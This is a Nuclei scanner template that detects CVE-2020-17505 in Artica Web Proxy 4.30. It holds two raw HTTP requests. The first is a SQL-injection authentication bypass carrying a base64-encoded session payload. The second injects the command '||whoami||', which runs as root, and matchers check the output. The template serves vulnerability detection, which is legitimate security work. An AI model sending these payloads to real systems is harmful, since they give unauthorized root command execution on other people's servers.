nuclei-templates/cves/CVE-2020-17505.yaml

45 lines
1.3 KiB
YAML

id: CVE-2020-17505
info:
name: Artica Web Proxy 4.30 OS Command Injection
author: dwisiswant0
severity: high
# Artica Web Proxy 4.30.00000000
# allows an authenticated remote attacker
# to inject commands via the service-cmds parameter in cyrus.php.
# These commands are executed with root
# privileges via service_cmds_peform.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
requests:
- raw:
- |
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
- |
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- "array(2)"
- "Position: ||whoami||"
- "root"
condition: and
part: body
- type: status
status:
- 200